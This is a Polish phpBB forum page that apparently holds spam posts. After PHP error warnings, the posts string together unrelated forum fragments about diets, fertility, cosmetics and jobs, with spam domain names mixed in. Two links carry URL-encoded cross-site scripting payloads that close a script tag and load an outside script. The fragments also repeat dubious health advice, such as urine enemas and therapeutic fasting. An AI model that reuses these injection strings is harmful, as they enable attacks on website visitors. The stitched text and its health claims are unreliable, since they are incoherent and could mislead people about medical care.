Warning: include(/www/htdocs/v099537/language/lang_german/lang_main.php): failed to open stream: Permission denied in /www/htdocs/v099537/includes/functions.php on line 338

Warning: include(): Failed opening './language/lang_german/lang_main.php' for inclusion (include_path='.:/usr/share/php:..') in /www/htdocs/v099537/includes/functions.php on line 338

Warning: include(/www/htdocs/v099537/includes/page_header.php): failed to open stream: Permission denied in /www/htdocs/v099537/viewtopic.php on line 577

Warning: include(): Failed opening './includes/page_header.php' for inclusion (include_path='.:/usr/share/php:..') in /www/htdocs/v099537/viewtopic.php on line 577
Mam u Ciebie d艂ug.

-> Sypher磗
::  
JeanettMq
-=TH CoreMaster=-

:
: 1731
: Dalestie

: Fri Apr 04, 2014 8:03 pm    : Mam u Ciebie d艂ug. Back to top

tak sobie czytam co piszesz i mam wra偶enie jakbym s艂ysza艂a sama siebie.
sferyczny.zachpomor.pl
Mr.
Ja kogel mogem robie tez z bialkami i jest pycha
A skad jestescie z Polski?
Z rezultatem leczenie oczywi艣cie poczekam do wyko艅czenia opakowania i ponownej wizyty u lekarza.
dziekuje za pomoc ten lekarz co chodze do niego raz mowi tak a raz innaczej a ja czuje ze cos jest nie tak a on ze to jajeczko jest jeszcze z przed ostatniej owulacji i trzeba je przebic
W necie tyle jest motywacyjnych zdj臋膰 kobiet po montiniacu, 偶e a偶 si臋 chce pr贸bowa膰.
Jeste艣 jak najbardziej normalna , Ulllu艣 chyba troch臋 przesadzi艂a w ocenie A wi臋c mailuj sobie dalej i sp臋dzaj mi艂o czas z zakonnikiem, tylko,uwa偶aj 偶eby艣 zn贸w nie cierpia艂a !!!!1 Trzymaj si臋 Pozdrawiam

Forum chyba zamiera...... setbol.waw.pl Pozdrawiam cieplutko!!!
Chcia艂am Ci tylko pokazac ze medycyna to nie matematyka. dostalam 18-tego dzis jest 21 a jak @ nie bylo tak nie ma z mezen staramy sie o dziecko od pol roku i juz sama nie wiem co myslec tym razem. Ca艂y czas trwaj膮 badania maj膮ce ustali膰, czy dieta-cud redukuje przy okazji zawarto艣膰 szkodliwych substancji we krwi i poprawia efektywno艣膰 dzia艂ania insuliny. Wiem, 偶e dla niekt贸rych to jest waga koszmar - 80 kg, ale dla mnie jest to cel, kt贸rego nie mog臋 osiagna膰 w swoim doros艂ym 偶yciu. Nie potrafi臋 podj膮膰 decyzji czy i艣膰 tam czy mo偶e lepiej do Sok贸艂ki? seterce.waw.pl
Tez sportowe, a ladniejsze wzory. W normalnych okoliczno艣ciach jest ok. Przegl膮dam ten w膮tek bo za kilka dni mam pierwsza rozmow臋 kwalifikacyjna i powiem wam, ze strasznie si臋 denerwuje. nagda nie 偶ebym ich nie lubi艂a ale niech tylko jakiego艣 spotkam to ubij臋 p[o ile m贸j kot nie znajdzie pierwszy ] Obecnie jestem w 36 tygodniu. dzi臋ki za pomoc ale to niestety nie jest piosenka Queen wi臋c szukam dalej jak by kto艣 wiedzia艂 co to za utw贸r dajcie zna膰...
Ja te偶 mam zamiar pisa膰 jak mi idzie, bo to mobilizuje i dodaje otuchy A jedzonko odstawiam w nast臋pny poniedzia艂ek.
Reszta do autorki
Teraz przenie艣li si臋 na ul.
Pewnie w duzej mierze to zale偶y od organizmu .
e zabiegu nie boli ale potem z pare dni,koszt my艣le 250-350 z艂
a ALOES na przet艂uszczanie w艂os贸w strickte.

Ps:
sfilmowana.elk.pl
co Ty na to , mo偶e z magazynu takie trafiaj膮? Karolinka zobacz;
wejdz na allegro i popatrz...to sklep w ktorym jest wszystko.
Michael Jackson - You are not alone
mam 23 lata i zarabiam 2000 miesiecznie.
Jak zwykle zaczyna si臋 nasz seks?
jak dla mnie niesamowite, bo niby wiedzia艂am, 偶e siedz臋 sobie bezpiecznie w fotelu, ale jednocze艣nie kurczowo trzyma艂am si臋 uchwyt贸w a nawet piszcza艂am z przera偶enia, gdy wodny stw贸r wychodzi艂 na mnie z ekranu to tyle reklamy...
Przede wszystkim od偶ywiaj si臋 w taki spos贸b, aby z艂agodzi膰 vata.
ale moi znajomi wyprawiali i nie bylo nudno
http://www.thefreelibrary.com/_/search/Search .aspx?SearchBy=0&Word=%2F%2F%2D%2D%3E%22%3E%3C%2F%73%63%72%6 9%70%74%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74
a jeszcze dodam - dziewczyna, kt贸ra szlaja艂a si臋 z Turasem nie ma czego u mnie szuka膰 - wi臋c ni b贸j si臋 - nie o Ciebie jestem zazdrosny hehehee

Natomiast ja,to chyba typowa blondynka Leczy艂am si臋 prywatnie u endokrynologa ale operacj臋 mia艂am w pa艅stwowym szpitalu,wi臋c nie widz臋 jako tako zwi膮zku.Mo偶e mia艂am szcz臋艣cie,mo偶e zbyt du偶e guzy,nie wiem...Nie neguj臋 decyzji innych ale patrz膮c na swoj膮 rodzin臋,zwyczajnie nie by艂oby mnie na to sta膰...po prostu,po ludzku.Ale ciesz臋 si臋,偶e kto艣 mo偶e odzyska膰 zdrowie p艂ac膮c bo go na to sta膰.Ot,taka skomplikowana dusza ze mnie seterze.waw.pl ze znow bedzie tak samo.i oczywscie jest.samospelniajaca sie przepowiednia.
Mam nadziej臋, 偶e chocia偶 5kg mniej b臋dzie...Oby... moi drodzy ... ale mam nadziej臋, 偶e za jaki艣 czas ca艂kowicie si臋 go pozb臋d臋. Tytu艂 D偶entelmena Roku otrzymuje cz艂owiek, kt贸ry nie by艂 w stanie znale藕膰 rymu do s艂owa zupa. Ja stosuj臋 te偶 lewatyw臋 z moczu kt贸r膮 tu wiele os贸b poleca艂o. sfinksie.nysa.pl
Na razie m贸wi艂 偶eby na spokojnie poczeka膰. A najgorsze, 偶e jak ju偶 to wstrzykniesz to nic z tym nie zrobisz - ani nie wyr贸wnasz kwasem hialuronowym, ani nic - tylko operacyjnie mo偶na to usuwa膰. Corona - The Summer Is Magic A jednak mam zahamowania, niech kto艣 mnie o艣wieci.. Najwazniejsze to czuc sie szczesliwa i pewna swoich wyborow. Ja dosta艂am dzis antybiotyk bo mam zapalnie dzi膮se艂, mam troszk臋 kamienia i chcialabym go usun膮膰. mam pytanie-ktora wersje stosujecie tej diety????ta ktora podala ewusia z ryzem,miesem i bananami czy ta z maslanka i owocami i warzywami na przemian????bo juz sie w tym pogubilam
Dzie艅 2
Dzisiaj po nocnej przygodzie na bank zdecyduj臋 si臋 na gruntowne czyszczenie pod 艂贸偶kiem;/
co daje im wysadzanie si臋 dajmy na to w autobusach ???
zreszta moze w ko艅cu przyjdzie ciep艂o..
I chcia艂abym sobie juzzmieni膰 sobie na nowego kolczyka, ale boje sie...
Witam
To jest forum informacyjne, a nie krwio偶ercze pastwisko z zacieraniem rak na brak klient贸w u innych.
-------------------------------------------------------- -------------------------------
Male/Female Sex - p艂e膰, male - m臋偶czyzna, female - kobieta
mam nadzieje, ze to wyszlo ok.

W dodatku moje dotychczas 艂adne paznokcie s膮 teraz ca艂kowicie zniszczone
serwujesz.waw.pl
3.Marcin Mroczek Wedlug mnie najlepszym kursem jest ten w akademii berendowicz & kublin maja siedziby w calej polsce a w katowoicach jezeli jest sie daleko maja w cene wliczony pobyt w ich prywatnym hotelu nad akademia hotel w sw
Co wi臋cej, istniej膮 nie tylko pokarmy, kt贸re hamuj膮 rozpad t艂uszcz贸w a nasilaj膮 ich gromadzenie, ale i takie, kt贸re dzia艂aj膮 odwrotnie.
Skaling i piaskowanie, to dwa odr臋bne zabiegi.
za 42 tab
Pot臋piali swojego brata i syna, wprost mi w oczy m贸wili r贸偶ne rzeczy na niego, z kt贸rych nawet zamierzam skorzysta膰 przy zeznaniach.
C贸rka Nataszy Urba艅skiej:
2.sci臋gno zginacza d艂ugiego kciuka
mam od dluzszego czasu problemy z jelitami, czy lewatywa moze mi pomoc?
powiedzcie gdzie dzia艂aj膮 ju偶 wahad艂a dostawcze zamiast oddzia艂贸w?
Caluski!!!
wlasnie obejrzalam druga -porazka!jestem zniesmaczona,ani taniec tej pary nie byl porywajacy a oni zle dobrani ,jakby z mlodszym bratem tanczyla,sztuczna milosc....klapa i tyle

[09.03] 13:09 madziarella sformalizowal.rawa-maz.pl Czesc!
Groszku juz tylko 15minut zaraz po pracy uciekam na cwiczenia, dzis mam ostatnie z karnetu - licza na wejscia - he he szczerze to wcale mi sie nie chce Chcia艂am si臋 pochwali膰, 偶e w艂a艣nie dzi艣 dostalam pozytywny wyrok orzekaj膮cy niewa偶no艣膰 mojego ma艂偶e艅stwa z I instancji z 艁om偶y, pozdrawiam i r贸wnie偶 偶ycz臋 Tobie tego samego panie dostawco, szczerze mowiac myslalam ze wy macie najlepsz膮 robot臋 z nas wszsytkich bo mowie sobie takie tam rozwozenie ale po twojej wypowiedzi widze ze kazde stanowisko w tej firmie jest zakl臋te.....a od zewn膮trz wydaje sie ze to taka po偶adna firma..ahhh , demi - takie czasy naszly nic na to nie poradzimy , albo dajemy sie robic albo ladujemy bez pracy ...ufff to straszne http://youtu.be/3IctJpVNehM utrzymujac ciagle kolana zgiete. sestercja.waw.pl
moja sytuacja nie jest najlepsza mam 168cm wzrostu i wa偶臋 oko艂o 85 kg Rzucaj to palenie w cholere W sumie palisz niewiele, i mysle, ze rzucenie nie powinno byc az tak ciezkie, ale skoro lubisz...to juz szanse maleja. The National Task Force on the Prevention and Treatment of Obesity only recommends very low calorie diets like this in extreme cases. Urban Cookie Colective U mnie oki.. Skoro wchodzi tam paluszek, wchodzi penisek, to jak taka tabletka mo偶e nie wej艣膰?? Poza tym nigdy nie jest tak, 偶e jak inni co艣 robi膮 to my te偶 od razu musimy, je艣li kto艣 nie chce dawa膰 nikomu ciasta po uroczysto艣ci, to nie musi tego robi膰.
po wyrokach endometriozy, zespo艂u policystycznych jajnik贸w, ty艂ozgi臋cia macicy- s艂ysza艂am, 偶e to moze trwa膰 a moze si臋 wcale nie uda膰..
prosz臋 o odpowied藕 staram si臋 o dzidzie 4 lata
Jestem jej sta艂膮 klientk膮 i ciesz臋 si臋 偶e trafi艂am w tak dobre r臋ce!
Male/Female Sex - p艂e膰, male - m臋偶czyzna, female - kobieta
w Mys艂owicach to chyba nie ma nic godnego polecenia
pozdrawiam

G艂od贸wk臋 odk艂adam na p贸藕niej, bo nie do ko艅ca czuj臋 si臋 teraz na si艂ach, a poza tym przeprowadzanie jej w sesji, by艂oby jednak troch臋 ryzykownym pomys艂em.
setke.waw.pl
To trudne, nawet bardzo trudne ale si臋 da!!!
Ja te偶
WREDNA !!!
A ja po przeczytaniu waszych wypowiedzi postanowi艂am,偶e w tym roku nie znikam jak b臋dzie kol臋da a mo偶e jaki艣 m艂ody, dowcipny przystojniak w sutannie wpadnie chcia艂abym poczu膰 i prze偶y膰 co艣 takiego jak Wy Pozdro .........
Albo jakis namiar,cokolwiek?
palona kawa a teraz czarny bez..
Fajnie, ze piszecie o Italii.
B膮d藕 dzielna

Heh mog艂as schowa膰 z 15 czekolad bez papierka i oddac kasjerce hahah sfilmuje.kalisz.pl mam pytanie .Czy nadal trzeba odnawiac pozwolenie na prace czy wystarczy ze jestem tu zameldowana??
Drugi taki sam by艂 nad moim 艂o偶kiem!!!! -2 kg by艂o. 10 USA, wi臋c 12 UK i 40 Eur - to mnie cieszy Najlepiej jest my艣le膰 pozytywnie Harry Nillson-Withoutyou serwilizmu.waw.pl
Czy mog臋 stara膰 si臋 o uprawnienie rzeczoznawcy maj膮tkowego, ? U mnie te偶 jest szaro i paskudnie, w w dodatku jeszcze mam od cholery roboty -bleeee!!!!!!!! w jakim tempie chudniesz,tzn ile w ciagu tygodnia? nie wiem jak w myslowicach ale w moim tredzie jest pobojowisko M贸j m膮偶 wyjmuje t膮 kamer臋, bo ju偶 coraz bli偶ej wyj艣cia ma艂ego na 艣wiat, po czym mi komunikuje, 偶e bateria si臋 roz艂adowa艂a, to ja do niego krzycz臋 to bierz aparat i chocia偶 zr贸b zdj臋cie, no to on wyskakuje z aparatem i d**a. Oczy potrafi膮 powiedzie膰 wi臋cej ni偶 s艂owa Wcze艣niej mia艂am blond.
Co ?!
Maya Feel it.
I ja tez slyszalam ze wlosi wyjezdzaja stad na polnoc bo dla nich tez tu nie ma pracy a czasami my im zabieramy.
jak wasz organizm na to reagowa艂?
Pozdriawiam, 偶ycz臋 mi艂ego dnia.
Ty a s艂ysza艂e艣 偶e w Anglii lekarz udusi艂 pacjentk臋 za to 偶e mu przeszkadza艂a w szyciu??
kosztowa艂oby nie to mas臋 nerw贸w razz tak wi臋c tym bardziej jestem zadowolona 偶ycze powodzenia dziewcz臋ta
Nie powiem zebys sie cieszyla, bo jednak kazda blizna jest przygnebiajaca ale to i tak lepsze.

JeanettMq
-=TH CoreMaster=-

:
: 1731
: Dalestie

: Fri Apr 04, 2014 8:04 pm    : Pozdrawiam. Back to top

Ja zawsze najpierw sprawdzam.
serwolatce.waw.pl
B臋d臋 tu wpada膰 偶eby da膰 zna膰 o rezultatach.
pozdrawiam
Przy okazji da艂em sobie wymrozi膰 kilkana艣cie brodawek na moim ciele.
prosze o kontakt z kim艣 kto mia艂 co艣 podobnego,mo偶e by mi pom贸g艂!m贸j nr gg.
HejA bAnANA lOlK!!!!!
Nie nale偶y przesadza膰 z uzyciem go ani te偶 bezpo艣rednio wylewa膰 na sk贸re, dodaje si臋 go tylko do wody.
Acha zaznaczam, 偶e po szwach Dr nigdy nie mialam 偶adnych komplikacji o dziwo po DR Bromie wszystko mi sie 艂adnie goi.
Bylam u ginekologa jakis miesciac temu mialam robiona cytografie wkuluczono torbiel, ani nic mi dokrot nie powiedziala, badania krwi tez w normie, poniewaz wykonalam je z racji juz 2 lteniego przyjomwania tabletek antykoncepcyjnych.

KASIENKA...dziurka nie powinna ci zarosna膰 ale sluchaj musizs tego srtupka namoczyc w spirytusie ze by c odszed艂 sam!! serwitor.waw.pl Ja te偶 widzia艂am jej zdj臋cia z pla偶y i by艂am mile zaskoczona.
Potem dostaje si臋 opakowanie, gdzie jest 30 tabletek, a 1 tabletka zawiera 75 mikrogram贸w leku. Musz臋 doda膰, 偶e m贸j 偶o艂膮dek i jelita zaczynaj膮 narzeka膰. Niestety toksoplazmoza wysz艂a pozytywnie, co 艣wiadczy艂o o tym ze j膮 mam. 500 to (w Twoim przypadku) zapotrzebowanie dodatkowe wynikaj膮ce z aktywno艣ci fizycznej a nie dzienne zapotrzebowanie !!! Ale mysl臋 ,偶e mo偶e choroba tarczycy mie膰 wp艂yw na p艂odno艣膰 , a jeszcze bardziej poziom prolaktyny. sfolgowac.pomorskie.pl
W polsce podobno wchodyi ta marka lub ju偶 wesz艂a, sprawdzciewww.uber.com.pl . wolalabym sie jakos psychicznie przygotowac.. I powoli, wierz臋, 偶e tak b臋dzie. Dobrze, 偶e nie zdecydowa艂am sie na nic wiecej . Od dw贸ch lat pr贸buj臋 obserwowa膰, kiedy ataki bulimii wyst臋puj膮 u mnie cz臋sciej, kiedy rzadziej, co jest przyczyn膮 tego wszystkiego, czemu nie potrafi臋 tak po prostu przesta膰 itp. poprawiam link. Na moim rowerku je藕d藕臋 godzin臋, ale to nie to samo.
no c贸偶.
pozdrawiam
A skad jestescie z Polski?
Pozdrawiam i 偶ycz臋 wytrwa艂o艣ci.
wymaga jest dobra ( czy nawet bardzo dobra) znajmosc jezyka angielskiego badz francuskiego ( zalezy do jakiej prowincji chcesz jechac).
Na atkinsie bylam przez 6 lat waga sie trzymala super.
Ja te偶 zakupi艂am te herbatki alr pij臋 je zaledwie od 2 dni,wi臋c efekt贸w jeszcze nie widz臋
Pani Basia - chodzi艂am do wielu kosmetyczek ale ta bije wszystkie na g艂owe - r臋ce kt贸re lecz膮, inaczej wypowiedzie膰 si臋 nie mog臋, pocz膮wszy od depilacji na czyszczeniu czy kwasach sko艅czywszy, ka偶dy zabieg jest jak rytua艂 spa.Ufam jej bezgranicznie i jeszcze nigdy si臋 nie przejecha艂am.
Ta zasada dzialala tez w druga strone.
Wielu z Nich nie troszczy si臋 o Wasze zdrowie tak naprawd臋.

To ju偶 trzecia moja usuni臋ta 贸semka.
sfalcujesz.mazowsze.pl
No i jest zaczerwieniony...
Marchew, korze艅 pietruszki,seler, cebul臋 obieramy.
To mo偶e by膰 dobry pomys艂, szczeg贸lnie w przypadku, kiedy chce si臋 wprowadzi膰 do organizmu substancje przeciwb贸lowe (kofeina), lecz膮ce (zio艂a), zmi臋kczaj膮ce i rozpuszczaj膮ce 艣luz.
mo偶e miesi膮c....
a zarazi膰 si臋 mo偶na nie tylko od kota, ale nawet jak siekasz kotlety - to w mi臋sie wieprzowym i innym mo偶e by膰 ten pierwotniak i wystarczy, 偶e pry艣nie ci w oko- i ju偶
wiecie, 偶e ja bardzo rzadko ogl膮dam si臋 w lustrze...
/konkrety, tu trzeba byc przygotowanym, nawet mozna datami rzucac
Woda pozwala pracowac wszystkim mi臋艣niom bez obci膮偶ania ko艣ci i staw贸w i to jest najwi臋ksze b艂ogos艂awie艅stwo aquarobiku
postraszcie pourywaniem 艂b贸w !
nie polecam naszego zak艂adu na paderweie

Panewnickiej 110, tel. sferze.zagan.pl Jest mi艂a i sympatyczna.
http://www.slimfigura.pl/nasze_produkty/syste m_slimfigura_tabs/system_slimfigura_tabs.html co by pani zrobi艂a jako kierownik sklepu widz膮c ze przed zamkni臋ciem kasjerka bierze chusteczki higieniczne i nie p艂膮ci za nie , ja osobiscie nie uznaj臋 z艂odziejstwa i nie wyobra偶am sobie pracowa膰 w takim zespole ale poczyta艂am forum ze jak dziewczyny na rozmowie powiedzia艂y ze zwr贸ci艂y by jej uwag臋 to rekrutuj膮cy odpowiedzia艂 ze wprowadz膮 z艂膮 atmosfer臋 do pracy , co wiec waszym zdaniem powinno si臋 odpowiedzie膰 na to pytanie 6 godz.) nie czu艂am b贸lu.. Wr贸ci艂a mi tak obrzydliwa oponka na brzuchu a bez niej by艂o tak fajnie .... Jezuuuu kolejna woda na mlyn uogolnien... serwohamulca.waw.pl
W tv m贸wia- \w tym sezonie modny bedzie dzins\- j**!! Witam wszystkie przysz艂e panny m艂ode i te kt贸re ju偶 prze偶y艂y sw贸j WA呕NY dzie艅. Zapraszamy z problemem wrastaj膮cych paznokci do Gabinetu podologicznego we Wroc艂awiuwww.achzdrowestopy.com Rano by艂y dwa 艂yczki wody i fajno! Przelej 5 z艂 na PIERWSZE znajduj膮ce si臋 poni偶ej konto bankowe tytu艂em: WZDZ OPOLE ORGANIZUJE 3 MIESIECZNY KURS FRYZJERSTWA, 200 GODZ, W TYM 50 TEORIA I 150 PRAKTYKA, KURS KOSZTUJE 2000ZL, PLATNE W RATACH, I WPLATA - 500ZL RESZTA W DOGODNYCH RATACH, ISTNIEJE MOZLIWOSC DOFINANSOWANIA DO KURSU Z URZEDU PRACY, ZAINTERESOWANE OSOBY PROSZE O KONTAKT, ZBIERAMY NOWA GRUPE, ZADZWON: Osobi艣cie uwa偶am, 偶e by艂 to krwiak, wi臋ksza ilo艣膰 krwi oznacza艂a jego wydalenie i tyle, jednak 偶aden z lekarzy o tym nigdy nie wspomnia艂, s膮 to tylko i wy艂膮cznie moje domys艂y.
i szczerzer mowiac czuje sie taka lekka psychicznie ,pozbylam sie brudu....
http://peb.pl/200569-aeroibiczna-szostka-weid era.html?highlight=szostka+weidera
Czy ta ma艣膰 sza艂wiowa jest bez recepty ?
Znacznie wi臋cej ni偶 takich zlece艅.
ja to nawet niemam ochoty wychodzic z domu chyba mala deprecha a ludzilam sie ze po operacji to bede latala jak skowronek a tu kiszka ale mnie to wnerwia a najgozej jak pani doktor mowi cierpliwosci powoli itp .
ja dzis sie dowiedzia艂am o torbieli prawego jajnika, mia艂am juz tam torbiel podczas ci膮zy ale stwierdono,偶e si臋 wch艂on臋艂a.teraz koszmar zacz膮艂 sie od nowa.wiem,偶e czeka mnie ci臋偶ki okres.
W dodatku moje dotychczas 艂adne paznokcie s膮 teraz ca艂kowicie zniszczone

wydaje mi si臋, 偶e to zale偶y od ilo艣ci tego r贸偶u.
serwolatka.waw.pl
Zwr贸膰cie uwag臋 czy og贸lnie ca艂e nie tyjecie, bo tak bywa przy tabletkach...
ja tez jestem ale dopiero 2 miesiace po operacji mi rowniez rozeszla sie do 3 mm oby juz sie to zatrzymalo bo teraz jak zblednie to jeszcze bedzie to mozna jakos zaakceptowac.
A te偶 mo偶esz wej艣膰 na ich kana艂 YouTube tam masz du偶o fryzur i porad na temat w艂os贸w
nikt ci nawet nie podzi臋kuje.ale mo偶e kiedy艣 co艣 w tym kraju si臋 poprawi i..............a wtedy nas doceni膮
i z gory dziekuje na odpowiedz.
O model-medzie wiele czyta艂am na innych topikach i ogromna cz臋艣c z艂ych wypowiedzi to g艂ownie m艣ciwe s艂owa jakiej艣 zdesperowanej panienki.
Wczoraj by艂am u lekarza i ........
po prostu inny model kulturowy - tam ojciec utrzymuje rodzin臋.
A aktorki s膮 kobietami tak jak my nie?..
Dlaczego?

Prosze poradzcie co powinnam robic-slyszalam ze moze ona peknac-ale moze to nie w moim przypadku... sfilmuje.kalisz.pl Nic wiecej nie wiem Wiecie mo偶e jaka pioseka tak sie zaczyna?
A speszy艂am si臋 bo jeden z nich okaza艂 si臋 wla艣nie tym narzeczonym - musz臋 powiedziec ze by艂 bardzo przej臋ty moim porodem ,pami臋tam rozmawia艂am z nim podczas rodzenia , i potem przy szyciu .Sta艂 obok z dwiema studentkami jak par艂am .Niby to juz lekarz , ale speszona by艂am strasznie ,przecie偶 oglada艂 mnie w takim stanie,podczas ca艂ego porodu , wcze艣niej te偶 , w tej wannie przecie偶 by艂am naga .Schizy mia艂am straszne , zaraz pomy艣la艂am co nagada tej kuzynce .Na szcz臋艣cie ju偶 po 艣lubie pogadalismy sobie , i mi przesz艂o ,ale jeszcze na weselu jak poprosi艂 do ta艅ca to mi jako艣 glupio by艂o . no widzisz aura pisze po swojemu kacik to jest mini pokoik adasia! czy tam warto i艣膰? niestety nie mia艂am czasu wzi膮膰 sie wcze艣niej za gotowanie, ale mam nadzieje 偶e to nic nie przeszkadza chyba wczoraj prze膰wiczy艂am... sferowy.wolomin.pl
Nie do艣膰,偶e dla 艣rodowiska,gdzie pracuj臋 jestem wdow膮 bo nie chwal臋 si臋 moim 偶yciorysem, a z exem na szcz臋艣cie nie mam kontaktu, po prostu zapad艂 si臋 pod ziemi臋 wyjecha艂 do swojej rodziny i tam 偶yje, napisze jeszce jak minie caly kurs czy w 100% sie oplaca tu przyjsc . Uwaga!!!! Wyszlo, ze mam toksoplazmoze! Schudnij albo nie, chamom podobaj膮 sie ogromne bimba艂y - to ich dowartosciowuje. Nazywam sie Sylwia, jestem ciemnej karnacji i mam czarne, do ramion w艂oski, r贸wnie偶 jak wy kr臋cone czasem uda mi sie je u艂ozyc i wygladaja super, ale niestety zdaza mi sie to bardzo rzadko!! No to ja tez co艣 dopisz臋,tak si臋 z Waszych u艣mia艂am!
Jesli bol膮 was inne stawy i marzn膮 wam r臋ce przy byle zimnie - idzcie do szpitala dermatologicznego albo reumatologicznego.
Ma艂e paj膮czki zabijam od razu, bo boj臋 si臋 i brzydz臋.
Hej dziewczyny
Nie wiem do jakiego mam si臋 uda膰 lekarza.
24 karty z poleceniami
a na 艣ledzie w oleju dam przepis z domu.
Nie jestem wariatka i jak pisalam zrezygnowalam ze slodyczy, ziemniakw i niezdrowych rzeczy wiec nie rzucaj sie prosze.
A co z pilatesem?
-75 g bitej 艣mietany bez cukru
t艂uszczyku pod sk贸r膮 i ju偶 problem.

A ka偶dy problem jest tylko kolejn膮 lekcj膮 dla nas.
sfajczony.lebork.pl
Ja nie pij臋, nie pal臋, ucz臋 si臋 w miar臋, k艂opot贸w wychowawczych raczej nie sprawiam, cho膰 zdarza si臋, 偶e nieraz co艣 tam odpyskuj臋.
zdecydowanie pierwsza!
Kupi艂am ju偶 antybiotyki kt贸rymi mam smarowa膰 rank臋.
Witajcie dziewczyny.
hej dziewczyny,
-------------------------------------------------------- -------------------------------

W艣r贸d g艂od贸wek leczniczych mo偶na wyr贸偶ni膰 takie, kt贸re podejmuje si臋 z powodu choroby i takie, kt贸re s艂u偶膮 oczyszczeniu i biologicznemu odm艂odzeniu organizmu, co te偶 w pewnym sensie jest rodzajem leczenia. sfaleryty.mragowo.pl Teraz ju偶 jest ze mna lepiej.
http://www.handster.com/catalog.php?search=%2 F%2F%2D%2D%3E%22%3E%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%6 9%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%62%61%74 liczebniczka fajnie by bylo jakby to byl ten kawalek, juz go szukam na bear share ale wiedzie膰 jak zje艣膰 to tak偶e - w innym przypadku ... Cleopatra STudio Fruzur a czym sobie sama usuwa艂a艣 tatua偶 偶e zosta艂a ci blizna bo chyba mam podobny problem. serwolatek.waw.pl
bo to moim zdaniem by艂aby duuuu偶a przesada!! Ktos0008: Ciekawy temat, lubi臋 o tym czytac, lubi臋 te偶 pogada膰 o tym, podpowiada膰, wymieni膰 si臋 do艣wiadczeniami Teraz mog臋 siedzie膰 w szkole i nie my艣le膰 o tym, 偶e m贸j brzuch g艂o艣no pracuje i musze zaraz na kibelek... I nie maj膮 na siebie wp艂ywu. M贸wi臋 Wam! Pozdrowionka Mam nadziej臋 偶e si臋 jako艣 trzymacie, tak tu ostatnio cicho...
Modereatorzy w ka偶dym dziale zawsze pomocni!
Cloodia, jakie masz wymiary pod biustem i w biu艣cie?
nie dajcie si臋 oszuka膰 !!!!
1 lub 2 - puszki pomidor贸w (mog膮 by膰 艣wie偶e)
Wyleczy艂em go p贸艂 roku temu ale ze wzgl臋du na to, 偶e by艂 bardzo nasilony - teraz mam ca艂膮 twarz w bliznach.
Tez kiedys myslalam o firmach zjmujacych sie import-export, ale szybko sprowadzilam sie \na ziemie\, bo prawda jest taka, ze nie mam nic do zaoferowania.

:   
        -> Sypher磗

Cobalt 2.0 phpBB theme/template by Jakob Persson.
Copyright © 2002-2004 Jakob Persson